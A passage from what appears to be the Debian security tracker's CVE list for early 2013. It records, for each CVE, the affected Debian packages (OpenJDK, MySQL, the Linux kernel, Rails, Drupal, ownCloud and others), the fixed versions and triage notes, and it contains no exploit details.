	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0432 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0431 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 7u3-2.1.6-1
	NOTE: IcedTea commit: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/b09c28ff798f
CVE-2013-0430 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0429 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0428 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0427 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0426 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0425 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0424 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0423 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0422 (Multiple vulnerabilities in Oracle Java 7 before Update 11 allow ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u3-2.1.4-1
	NOTE: Exploitable on Linux http://www.openwall.com/lists/oss-security/2013/01/11/1
CVE-2013-0421
	RESERVED
CVE-2013-0420 (Unspecified vulnerability in the VirtualBox component in Oracle ...)
	- virtualbox 4.1.18-dfsg-2 (bug #698292)
	- virtualbox-ose (Vulnerable code not present)
CVE-2013-0419 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0418 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Outside In
CVE-2013-0417 (Unspecified vulnerability in the Sun Storage Common Array Manager ...)
	NOT-FOR-US: Sun Storage Common Array Manager
CVE-2013-0416 (Unspecified vulnerability in the Siebel Enterprise Application ...)
	NOT-FOR-US: Oracle Siebel
CVE-2013-0415 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-0414 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-0413 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-0412 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...)
	NOT-FOR-US: Solaris
CVE-2013-0411 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows ...)
	NOT-FOR-US: Solaris
CVE-2013-0410 (Unspecified vulnerability in the Agile EDM component in Oracle Supply ...)
	NOT-FOR-US: Oracle Supply Chain
CVE-2013-0409 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-0408 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-0407 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-0406 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...)
	NOT-FOR-US: Solaris
CVE-2013-0405 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...)
	NOT-FOR-US: Solaris
CVE-2013-0404 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-0403 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...)
	NOT-FOR-US: Solaris
CVE-2013-0402 (Heap-based buffer overflow in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0401 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-0400 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-0399 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-0398
	RESERVED
CVE-2013-0397 (Unspecified vulnerability in the Oracle Applications Framework ...)
	NOT-FOR-US: Oracle Applications Framework
CVE-2013-0396 (Unspecified vulnerability in the Application Performance Management ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0395 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0394 (Unspecified vulnerability in the PeopleSoft HRMS component in Oracle ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0393 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Outside In
CVE-2013-0392 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0391 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0390 (Unspecified vulnerability in the Oracle Applications Framework ...)
	NOT-FOR-US: Oracle Applications Framework
CVE-2013-0389 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0388 (Unspecified vulnerability in the PeopleSoft HRMS component in Oracle ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0387 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0386 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0385 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0384 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0383 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0382 (Unspecified vulnerability in the Oracle Marketing component in Oracle ...)
	NOT-FOR-US: Oracle E Business suite
CVE-2013-0381 (Unspecified vulnerability in the Oracle CRM Technical Foundation ...)
	NOT-FOR-US: Oracle E Business suite
CVE-2013-0380 (Unspecified vulnerability in the Oracle Payroll component in Oracle ...)
	NOT-FOR-US: Oracle E Business suite
CVE-2013-0379 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-0378 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-0377 (Unspecified vulnerability in the Oracle Applications Technology Stack ...)
	NOT-FOR-US: Oracle E Business suite
CVE-2013-0376 (Unspecified vulnerability in the Oracle Applications Framework ...)
	NOT-FOR-US: Oracle E Business suite
CVE-2013-0375 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0374 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Enterprise Manager
CVE-2013-0373 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Enterprise Manager
CVE-2013-0372 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Enterprise Manager
CVE-2013-0371 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0370 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...)
	NOT-FOR-US: Oracle Supply Chain product suite
CVE-2013-0369 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0368 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0367 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0366 (Unspecified vulnerability in the Mobile Server component in Oracle ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0365 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-0364 (Unspecified vulnerability in the Mobile Server component in Oracle ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0363 (Unspecified vulnerability in the Mobile Server component in Oracle ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0362 (Unspecified vulnerability in the Mobile Server component in Oracle ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0361 (Unspecified vulnerability in the Mobile Server component in Oracle ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0360 (Unspecified vulnerability in the Application Performance Management ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0359 (Unspecified vulnerability in the APM - Application Performance ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0358 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0357 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0356 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0355 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0354 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0353 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0352 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0351 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0350 [writes content from TCP streams to public readable file /tmp/smtp.log]
	RESERVED
	- pktstat 1.8.5-3 (bug #701211)
	[squeeze] - pktstat (Vulnerable code not present)
CVE-2013-0349 (The hidp_setup_hid function in net/bluetooth/hidp/core.c in the Linux ...)
	{DSA-2668-1}
	- linux 3.2.39-1
	- linux-2.6
CVE-2013-0348 [sthttpd world-readable logdir]
	RESERVED
	NOT-FOR-US: sthttpd
CVE-2013-0347 [webfs world-readable logdir]
	RESERVED
	- webfs (low; bug #701638)
	[wheezy] - webfs (Minor issue)
	[squeeze] - webfs (Minor issue)
CVE-2013-0346 [tomcat world-readable logdir]
	RESERVED
	- tomcat6 (Log files are owned by tomcat:tomcat)
CVE-2013-0345 [varnish world-readable logdir]
	RESERVED
	- varnish (Logfiles are owned by varnishlog:varnishlog)
CVE-2013-0344
	RESERVED
CVE-2013-0343 (The ipv6_create_tempaddr function in net/ipv6/addrconf.c in the Linux ...)
	- linux (low)
	- linux-2.6 (low)
CVE-2013-0342 [CreateID() creates serialized packet IDs for RADIUS]
	RESERVED
	- pyrad (bug #701151)
	NOTE: this is initially related to #700669
CVE-2013-0341
	RESERVED
CVE-2013-0340
	RESERVED
CVE-2013-0339 [CPU consumption DoS when performing string substitutions during external entities expansion]
	RESERVED
	{DSA-2652-1}
	- libxml2 2.8.0+dfsg1-7+nmu1 (bug #702260)
CVE-2013-0338 (libxml2 2.9.0 and earlier allows context-dependent attackers to cause ...)
	{DSA-2652-1}
	- libxml2 2.8.0+dfsg1-7+nmu1 (bug #702260)
CVE-2013-0337 [Directory /var/log/nginx is world readable]
	RESERVED
	- nginx (low; bug #701112)
	[squeeze] - nginx (Minor issue)
	[wheezy] - nginx (Minor issue)
CVE-2013-0336 [DoS when connecting with a missing username/dn]
	RESERVED
	- 389-ds-base (bug #704077)
CVE-2013-0335 (OpenStack Compute (Nova) Grizzly, Folsom (2012.2), and Essex (2012.1) ...)
	- nova 2012.1.1-14 (bug #701773)
CVE-2013-0334
	RESERVED
CVE-2013-0333 (lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before ...)
	{DSA-2613-1}
	- rails 2.3.14.1 (bug #699226)
	- ruby-activesupport-2.3 2.3.14-6 (bug #699249)
	NOTE: Starting with 2.3.14.1 rails is a transition package
	NOTE: https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
CVE-2013-0332 (Multiple directory traversal vulnerabilities in ZoneMinder 1.24.x ...)
	{DSA-2640-1}
	- zoneminder 1.25.0-1 (bug #700912)
CVE-2013-0331 (CloudBees Jenkins before 1.502 and LTS before 1.480.3 allows remote ...)
	- jenkins (bug #700761)
CVE-2013-0330 (Unspecified vulnerability in CloudBees Jenkins before 1.502 and LTS ...)
	- jenkins (bug #700761)
CVE-2013-0329 (Unspecified vulnerability in CloudBees Jenkins before 1.502 and LTS ...)
	- jenkins (bug #700761)
CVE-2013-0328 (Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before ...)
	- jenkins (bug #700761)
CVE-2013-0327 (Cross-site request forgery (CSRF) vulnerability in Jenkins master in ...)
	- jenkins (bug #700761)
CVE-2013-0326
	RESERVED
	- nova (low)
	[wheezy] - nova (Minor issue)
CVE-2013-0325 (Multiple cross-site scripting (XSS) vulnerabilities in the Varnish ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0324 (Cross-site scripting (XSS) vulnerability in the Rendered links ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0323 (Cross-site scripting (XSS) vulnerability in the Display Suite module ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0322 (Cross-site scripting (XSS) vulnerability in Views in the Ubercart ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0321 (Cross-site scripting (XSS) vulnerability in Views in the Ubercart ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0320 (Cross-site request forgery (CSRF) vulnerability in the Taxonomy ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0319 (Cross-site scripting (XSS) vulnerability in the Yandex.Metrics module ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0318 (The admin page in the Banckle Chat module for Drupal does not properly ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0317 (Cross-site scripting (XSS) vulnerability in the Manager Change for ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0316 (The Image module in Drupal 7.x before 7.20 allows remote attackers to ...)
	- drupal7 7.14-2 (bug #701165)
	- drupal6 (Only affects Drupal 7)
CVE-2013-0315 (The GateIn Portal export/import gadget in JBoss Enterprise Portal ...)
	NOT-FOR-US: GateIn Portal
CVE-2013-0314 (The GateIn Portal export/import gadget in JBoss Enterprise Portal ...)
	NOT-FOR-US: GateIn Portal
CVE-2013-0313 (The evm_update_evmxattr function in ...)
	- linux 3.2.39-1
	- linux-2.6 (Vulnerable code not present)
CVE-2013-0312 (389 Directory Server before 1.3.0.4 allows remote attackers to cause a ...)
	- 389-ds-base 1.3.0.3-1
CVE-2013-0311 (The translate_desc function in drivers/vhost/vhost.c in the Linux ...)
	- linux 3.2.41-1
	- linux-2.6 (Vulnerable code not present)
CVE-2013-0310 (The cipso_v4_validate function in net/ipv4/cipso_ipv4.c in the Linux ...)
	- linux 3.2.29-1
	- linux-2.6 (Vulnerable code not present)
CVE-2013-0309 (arch/x86/include/asm/pgtable.h in the Linux kernel before 3.6.2, when ...)
	- linux 3.2.32-1
	- linux-2.6 (THP not in Squeeze)
	NOTE: Probably gone since 3.2.32, but I checked 3.2.41-2
CVE-2013-0308 (The imap-send command in GIT before 1.8.1.4 does not verify that the ...)
	- git (OpenSSL support is not enabled in Debian, see bug #701586)
	NOTE: http://marc.info/?l=git&m=136134619013145&w=2
	NOTE: Further reference about SSL support in imap-send #434599 needs to be addressed first
CVE-2013-0307 [XSS vulnerability]
	RESERVED
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/
CVE-2013-0306 (The form library in Django 1.3.x before 1.3.6, 1.4.x before 1.4.4, and ...)
	{DSA-2634-1}
	- python-django 1.4.4-1 (bug #701186)
CVE-2013-0305 (The administrative interface for Django 1.3.x before 1.3.6, 1.4.x ...)
	{DSA-2634-1}
	- python-django 1.4.4-1 (bug #701186)
	NOTE: https://www.djangoproject.com/weblog/2013/feb/19/security/
CVE-2013-0304
	RESERVED
CVE-2013-0303 [Multiple code executions]
	RESERVED
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-006/
CVE-2013-0302
	RESERVED
CVE-2013-0301 [Multiple CSRF vulnerabilities]
	RESERVED
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/
CVE-2013-0300 [Multiple CSRF vulnerabilities]
	RESERVED
	- owncloud (Vulnerable code not present, only affects 4.5 branch)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/
CVE-2013-0299 [Multiple CSRF vulnerabilities]
	RESERVED
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/
CVE-2013-0298 [XSS vulnerability]
	RESERVED
	- owncloud (Vulnerable code not present, only affects 4.5 branch)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/
CVE-2013-0297 [XSS vulnerability]
	RESERVED
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/
CVE-2013-0296 [creates temp files with too wide permissions]
	RESERVED
	- pigz 2.2.4-2 (low; bug #700608)
	[squeeze] - pigz (Minor issue)
CVE-2013-0295 [CreateID() creates serialized packet IDs for RADIUS]
	RESERVED
CVE-2013-0294 [potentially predictable password hashing]
	RESERVED
	- pyrad 2.0-2 (low; bug #700669)
	[wheezy] - pyrad 1.2-1+deb7u2
	[squeeze] - pyrad (Minor issue)
CVE-2013-0293 [Lock screen accepts F2 to drop to shell]
	RESERVED
	- ovirt-node (bug #502024)
CVE-2013-0292 (The dbus_g_proxy_manager_filter function in dbus-gproxy in Dbus-glib ...)
	- dbus-glib 0.100.1-1 (bug #700638; high)
	[squeeze] - dbus-glib 0.88-2.1+squeeze1
CVE-2013-0291
	RESERVED
CVE-2013-0290 (The __skb_recv_datagram function in net/core/datagram.c in the Linux ...)
	- linux (Introduced in 3.4, fixed in 3.8)
	- linux-2.6 (Introduced in 3.4)
CVE-2013-0289 [missing SSL subject verification]
	RESERVED
	- isync 1.0.4-2.2 (low; bug #701052)
	[squeeze] - isync (Minor issue)
	NOTE: http://isync.git.sourceforge.net/git/gitweb.cgi?p=isync/isync;a=patch;h=914ede18664980925628a9ed2a73ad05f85aeedb
CVE-2013-0288 (nss-pam-ldapd before 0.7.18 and 0.8.x before 0.8.11 allows ...)
	{DSA-2628-1}
	- nss-pam-ldapd 0.8.10-3 (bug #690319)
CVE-2013-0287 (The Simple Access Provider in System Security Services Daemon (SSSD) ...)
	- sssd (Introduced in 1.9.0)
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/12
CVE-2013-0286
	RESERVED
CVE-2013-0285 (The nori gem 2.0.x before 2.0.2, 1.1.x before 1.1.4, and 1.0.x before ...)
	NOT-FOR-US: nori Ruby gem
CVE-2013-0284 (Ruby agent 3.2.0 through 3.5.2 serializes sensitive data when ...)
	NOT-FOR-US: newrelic_rpm Ruby gem
CVE-2013-0283
	RESERVED
CVE-2013-0282 (OpenStack Keystone Grizzly before 2013.1, Folsom 2012.1.3 and earlier, ...)
	- keystone 2012.1.1-13 (bug #700947)
CVE-2013-0281 [DoS when remote CIB management enabled]
	RESERVED
	- pacemaker (low; bug #700923)
	[squeeze] - pacemaker (Minor issue)
	[wheezy] - pacemaker (Minor issue)
CVE-2013-0280
	REJECTED
CVE-2013-0279
	REJECTED
CVE-2013-0278
	REJECTED
CVE-2013-0277 (ActiveRecord in Ruby on Rails before 2.3.17 and 3.x before 3.1.0 ...)
	{DSA-2620-1}
	- ruby-activerecord-2.3 2.3.14-5
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transition package
CVE-2013-0276 (ActiveRecord in Ruby on Rails before 2.3.17, 3.1.x before 3.1.11, and ...)
	{DSA-2620-1}
	- ruby-activemodel-3.2 3.2.6-3
	- ruby-activerecord-2.3 2.3.14-5
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transition package
	NOTE: The fix for 3.2 is present in ruby-activemodel-3.2, not ruby-activerecord-3.2
CVE-2013-0275 (Multiple cross-site scripting (XSS) vulnerabilities in Ganglia Web ...)
	- ganglia (low; bug #700158)
	[squeeze] - ganglia (Minor issue)
	[wheezy] - ganglia (Minor issue)
	- ganglia-web (bug #700159)
	NOTE: https://github.com/ganglia/ganglia-web/commit/31d348947419058c43b8dfcd062e2988abd5058e
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=892823
CVE-2013-0274 (upnp.c in libpurple in Pidgin before 2.10.7 does not properly ...)
	- pidgin 2.10.6-3
	NOTE: http://www.pidgin.im/news/security/?id=68
CVE-2013-0273 (sametime.c in the Sametime protocol plugin in libpurple in Pidgin ...)
	- pidgin 2.10.6-3
	NOTE: http://pidgin.im/news/security/?id=67
CVE-2013-0272 (Buffer overflow in http.c in the MXit protocol plugin in libpurple in ...)
	- pidgin 2.10.6-3
	NOTE: http://pidgin.im/news/security/?id=66
CVE-2013-0271 (The MXit protocol plugin in libpurple in Pidgin before 2.10.7 might ...)
	- pidgin 2.10.6-3
	NOTE: http://pidgin.im/news/security/?id=65
CVE-2013-0270 (OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier ...)
	NOTE: Duplicate of CVE-2013-0247, see bug #700240
	NOTE: https://bugs.launchpad.net/keystone/+bug/1099025
CVE-2013-0269 (The JSON gem before 1.5.5, 1.6.x before 1.6.8, and 1.7.x before 1.7.7 ...)
	- ruby-json 1.7.3-3 (bug #700436)
	- libjson-ruby
	- ruby1.9.1 1.9.3.194-7 (bug #700436)
	- ruby1.8 (json ext not present in 1.8)
CVE-2013-0268 (The msr_open function in arch/x86/kernel/msr.c in the Linux kernel ...)
	- linux 3.2.39-1
	- linux-2.6 2.6.32-48squeeze1
CVE-2013-0267
	RESERVED
	NOT-FOR-US: Apache VCL
CVE-2013-0266 (manifests/base.pp in the puppetlabs-cinder module, as used in ...)
	NOT-FOR-US: Openstack Packstack
CVE-2013-0265 (The redirect_stderr function in xnbd_common.c in xnbd-server and ...)
	- xnbd 0.1.0-pre-hg20-e75b93a47722-3 (low)
	NOTE: http://seclists.org/oss-sec/2013/q1/248
CVE-2013-0264
	RESERVED
	NOT-FOR-US: Cumin
CVE-2013-0263 (Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5, ...)
	- ruby-rack 1.4.1-2.1 (bug #700226)
	- librack-ruby (bug #700226)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=802794
	NOTE: Patches in git, commits 0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07 and 9a81b961457805f6d1a5c275d053068440421e11
CVE-2013-0262 (rack/file.rb (Rack::File) in Rack 1.5.x before 1.5.2 and 1.4.x before ...)
	- ruby-rack 1.4.1-2.1 (bug #700173)
	- librack-ruby (Introduced in 1.4.0, see #700226)
	NOTE: Patches in git, commit 6f237e4c9fab649d3750482514f0fde76c56ab30
CVE-2013-0261 ((1) installer/basedefs.py and (2) modules/ospluginutils.py in ...)
	NOT-FOR-US: Openstack Packstack
CVE-2013-0260 (Unspecified vulnerability in the Drush Debian Packaging module for ...)
	NOT-FOR-US: Drupal module debuild
	NOTE: This is a different thing from the drush package.
CVE-2013-0259 (Cross-site scripting (XSS) vulnerability in the Boxes module 7.x-1.x ...)
	NOT-FOR-US: Drupal module Boxes
CVE-2013-0258 (The Google Authenticator login (ga_login) module 7.x before 7.x-1.3 ...)
	NOT-FOR-US: Drupal module ga_login
CVE-2013-0257 (The email2image module 6.x-1.x and 6.x-2.x for Drupal does not ...)
	NOT-FOR-US: Drupal module email2image
CVE-2013-0256 (darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before ...)
	- ruby1.9.1 1.9.3.194-6 (low; bug #699929)
	- ruby1.8 (Only affects 1.9 and 2.0)
	NOTE: http://marc.info/?l=oss-security&m=136021623726440&w=2
	NOTE: https://github.com/rdoc/rdoc/commit/ffa87887ee0517793df7541629a470e331f9fe60
CVE-2013-0255 (PostgreSQL 9.2.x before 9.2.3, 9.1.x before 9.1.8, 9.0.x before ...)
	{DSA-2630-1}
	- postgresql-9.1 9.1.8-1
	- postgresql-8.4 8.4.16-1
CVE-2013-0254 (The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before ...)
	- qt4-x11 4:4.8.2+dfsg-11 (bug #699870)
CVE-2013-0253 (The default configuration of Apache Maven 3.0.4, when using Maven ...)
	- wagon2 2.2-3+nmu1 (bug #701991)
CVE-2013-0252 (boost::locale::utf::utf_traits in the Boost.Locale library in Boost ...)
	- boost1.50 (bug #699650)
	- boost1.49 1.49.0-3.2 (bug #699649)
	- boost1.42 (Boost.Locale was not part of boost until 1.48.0, bug #699719)
CVE-2013-0251 (Stack-based buffer overflow in llogincircuit.cc in latd 1.25 through ...)
	- latd 1.31 (low; bug #699625)
	[squeeze] - latd (Minor issue)
CVE-2013-0250 [corosync: Remote DoS due to improper HMAC initialization]
	RESERVED
	- corosync (Introduced in v1.99.8-2-ge925f42; bug #699615)
	NOTE: https://github.com/corosync/corosync/commit/4378915a33ab7fbbb5874f79dd7cd71b014ef44e#L0R407
	NOTE: http://www.openwall.com/lists/oss-security/2013/02/01/1
CVE-2013-0249 (Stack-based buffer overflow in the Curl_sasl_create_digest_md5_message ...)
	- curl 7.29.0-1 (bug #700002)
	[squeeze] - curl (Only affects 7.26.0 to 7.28.1)
	[wheezy] - curl 7.26.0-1+wheezy1
CVE-2013-0248 (The default configuration of javax.servlet.context.tempdir in Apache ...)
	- libcommons-fileupload-java (unimportant)
	NOTE: Only affects example code
CVE-2013-0247 (OpenStack Keystone Essex 2012.1.3 and earlier, Folsom 2012.2.3 and ...)
	- keystone 2012.1.1-12 (bug #699835)
CVE-2013-0246 [Access bypass Image module - Drupal 7]
	RESERVED
	- drupal7 7.14-1.3 (bug #698334)
	NOTE: https://drupal.org/SA-CORE-2013-001
CVE-2013-0245 [Access bypass Book module printer friendly version - Drupal 6 and 7]
	RESERVED
	- drupal6 (bug #698333)
	- drupal7 7.14-1.3 (bug #698334)
	NOTE: https://drupal.org/SA-CORE-2013-001
CVE-2013-0244 [Cross-site scripting (Various core and contributed modules - Drupal 6 and 7)]
	RESERVED
	- drupal6 (bug #698333)
	- drupal7 7.14-1.3 (bug #698334)
	NOTE: https://drupal.org/SA-CORE-2013-001
CVE-2013-0242 (Buffer overflow in the extend_buffers function in the regular ...)
	- eglibc 2.17-2 (low; bug #699399)
	[wheezy] - eglibc (Minor issue)
	[squeeze] - eglibc (Minor issue)
	NOTE: http://seclists.org/oss-sec/2013/q1/202
CVE-2013-0241 (The QXL display driver in QXL Virtual GPU 0.1.0 allows local users to ...)
	- xserver-xorg-video-qxl 0.0.17-1 (bug #699396)
	NOTE: http://seclists.org/oss-sec/2013/q1/204
	TODO: check whether this affects Stable: does qemu-KVM in Stable enable SPICE?
CVE-2013-0240 (Gnome Online Accounts (GOA) 3.4.x, 3.6.x before 3.6.3, and 3.7.x ...)
	- gnome-online-accounts 3.4.2-2 (bug #699825)
CVE-2013-0239 (Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2013-0238 (The try_parse_v4_netmask function in hostmask.c in IRCD-Hybrid before ...)
	{DSA-2618-1}
	- ircd-hybrid 1:7.2.2.dfsg.2-10 (bug #699267; high)
